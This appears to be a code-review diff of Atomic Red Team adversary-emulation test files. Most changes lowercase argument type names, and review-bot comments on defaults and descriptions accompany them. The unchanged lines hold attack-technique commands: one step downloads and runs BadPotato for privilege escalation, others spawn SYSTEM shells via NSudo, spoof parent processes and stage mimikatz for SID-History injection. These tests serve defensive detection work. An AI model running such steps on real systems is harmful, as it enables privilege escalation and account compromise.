type: String
type: string
default: abcdefghijklmnopqrstuvwxyz123456
executor:
command: |
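Review bot: destination_url is typed `url` in both hunks, but its defaults `redcanary.com` and `example.com` carry no scheme; if the schema's `url` type validates format (which the rename from `Url` suggests), these defaults may not pass. Either confirm that bare hostnames are accepted by the validator, or prefix the defaults with `https://` after checking how the executor command interpolates `#{destination_url}` so the change does not alter the request it sends.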
+15 -16
@@ -1,6 +1,5 @@
---
attack_technique: T1133
display_name: External Remote Services
attack_technique: T1133
display_name: External Remote Services
atomic_tests:
- name: Running Chrome VPN Extensions via the Registry 2 vpn extension
@@ -8,29 +7,29 @@ atomic_tests:
description: |
Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list
supported_platforms:
- windows
- windows
input_arguments:
chrome_url:
description: chrome installer download URL
type: Url
type: url
default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe
extension_id:
description: chrome extension id
type: String
default: |
type: string
default: |
"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"
dependency_executor_name: powershell
dependencies:
- description: |
Chrome must be installed
prereq_command: 'if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}'
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url}
Start-Process $env:temp\ChromeStandaloneSetup64.exe /S
dependencies:
- description: |
Chrome must be installed
prereq_command: 'if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}'
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url}
Start-Process $env:temp\ChromeStandaloneSetup64.exe /S
executor:
name: powershell
elevation_required: true
command: |
command: |
$extList = #{extension_id}
foreach ($extension in $extList) {
New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force
@@ -38,7 +37,7 @@ atomic_tests:
Start chrome
Start-Sleep -Seconds 30
Stop-Process -Name "chrome"
cleanup_command: |
cleanup_command: |
$extList = #{extension_id}
foreach ($extension in $extList) {
Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore}
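Review bot: extension_id is typed `string` but its default is a YAML block scalar (`|`) holding a PowerShell array literal (`"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"`) that is interpolated verbatim into `$extList = #{extension_id}`. The type is technically correct, but the block scalar contributes a trailing newline to the assignment and makes the intent (a list of ids) hard to see; a single quoted scalar, or a description noting that the value must be a PowerShell array literal, would be clearer for other runners consuming the schema.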
+11 -11
@@ -39,7 +39,7 @@ atomic_tests:
input_arguments:
nsudo_path:
description: 'Path to the NSudo bat file'
type: Path
type: path
default: $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher\x64\NSudoLG.exe
dependency_executor_name: powershell
dependencies:
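Review bot: nsudo_path is described as "Path to the NSudo bat file" while its default points at `NSudoLG.exe`; since this hunk already touches the argument's type line, update the description to say executable so the `path` type, the description and the default agree.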
@@ -54,9 +54,9 @@ atomic_tests:
Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore
executor:
command: |
Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
Start-Sleep -Second 5
Stop-Process -Name "cmd" -force -erroraction silentlycontinue
Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
Start-Sleep -Second 5
Stop-Process -Name "cmd" -force -erroraction silentlycontinue
name: powershell
- name: Bad Potato
auto_generated_guid: 9c6d799b-c111-4749-a42f-ec2f8cb51448
@@ -66,7 +66,7 @@ atomic_tests:
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
dependencies:
- description: |
BadPotato.exe must exist in the temp directory
prereq_command: |
@@ -75,12 +75,12 @@ atomic_tests:
Invoke-WebRequest -OutFile $env:TEMP\BadPotato.exe "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true"
executor:
command: |
cd $env:temp
Start-Process .\BadPotato.exe notepad.exe
Start-Sleep -Second 20
Stop-Process -Name "notepad" -force -erroraction silentlycontinue
Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue
cd $env:temp
Start-Process .\BadPotato.exe notepad.exe
Start-Sleep -Second 20
Stop-Process -Name "notepad" -force -erroraction silentlycontinue
Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue
cleanup_command: |
taskkill /f /im notepad.exe
name: powershell
elevation_required: true
elevation_required: true
+15 -15
@@ -14,23 +14,23 @@ atomic_tests:
input_arguments:
parent_process_name:
description: Name of the parent process
type: String
type: string
default: explorer
spawnto_process_path:
description: Path of the process to spawn
type: Path
type: path
default: C:\Program Files\Internet Explorer\iexplore.exe
dll_process_name:
description: Name of the created process from the injected dll
type: String
type: string
default: calculator
dll_path:
description: Path of the dll to inject
type: Path
type: path
default: PathToAtomicsFolder\T1134.004\bin\calc.dll
spawnto_process_name:
description: Name of the process to spawn
type: String
type: string
default: iexplore
dependency_executor_name: powershell
dependencies:
@@ -65,15 +65,15 @@ atomic_tests:
input_arguments:
file_path:
description: File path or name of process to spawn
type: Path
type: path
default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe
parent_pid:
description: PID of process to spawn from
type: String
type: string
default: $PID
command_line:
description: Specified command line to use
type: String
type: string
default: -Command Start-Sleep 10
dependencies:
- description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
@@ -94,11 +94,11 @@ atomic_tests:
input_arguments:
parent_pid:
description: PID of process to spawn from
type: String
type: string
default: $PID
test_guid:
description: Defined test GUID
type: String
type: string
default: 12345678-1234-1234-1234-123456789123
dependencies:
- description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
@@ -119,11 +119,11 @@ atomic_tests:
input_arguments:
command_line:
description: Specified command line to use
type: String
type: string
default: -Command Start-Sleep 10
file_path:
description: File path or name of process to spawn
type: Path
type: path
default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe
dependencies:
- description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
@@ -144,15 +144,15 @@ atomic_tests:
input_arguments:
command_line:
description: Specified command line to use
type: String
type: string
default: -Command Start-Sleep 10
file_path:
description: File path or name of process to spawn
type: Path
type: path
default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe
parent_name:
description: Parent process to spoof from
type: Path
type: path
default: $Env:windir\System32\notepad.exe
dependencies:
- description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+4 -4
@@ -6,19 +6,19 @@ atomic_tests:
description: |
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. Must be run on domain controller
supported_platforms:
- windows
- windows
input_arguments:
sid_to_inject:
description: SID to inject into sidhistory
type: String
type: string
default: S-1-5-21-1004336348-1177238915-682003330-1134
sam_account_name:
description: Target account to modify
type: String
type: string
default: '$env:username'
mimikatz_path:
description: Mimikatz windows executable
type: Path
type: path
default: '$env:TEMP\mimikatz\x64\mimikatz.exe'
dependency_executor_name: powershell
dependencies:
+5 -5
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
computer_name:
description: Computer name to find a mount on.
type: String
type: string
default: computer1
executor:
command: |
@@ -27,11 +27,11 @@ atomic_tests:
input_arguments:
package_checker:
description: Package checking command. Debian - dpkg -s samba
type: String
type: string
default: (rpm -q samba &>/dev/null) || (dpkg -s samba | grep -q installed)
package_installer:
description: Package installer command. Debian - apt install samba
type: String
type: string
default: (which yum && yum -y install epel-release samba)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y samba)
dependency_executor_name: bash
dependencies:
@@ -56,7 +56,7 @@ atomic_tests:
input_arguments:
computer_name:
description: Computer name to find a mount on.
type: String
type: string
default: localhost
executor:
command: |
@@ -109,7 +109,7 @@ atomic_tests:
input_arguments:
parameters:
description: ShareFinder parameter
type: String
type: string
default: -CheckShareAccess
dependencies:
- description: Invoke-ShareFinder module must exist in %TEMP% directory

Some files were not shown because too many files have changed in this diff.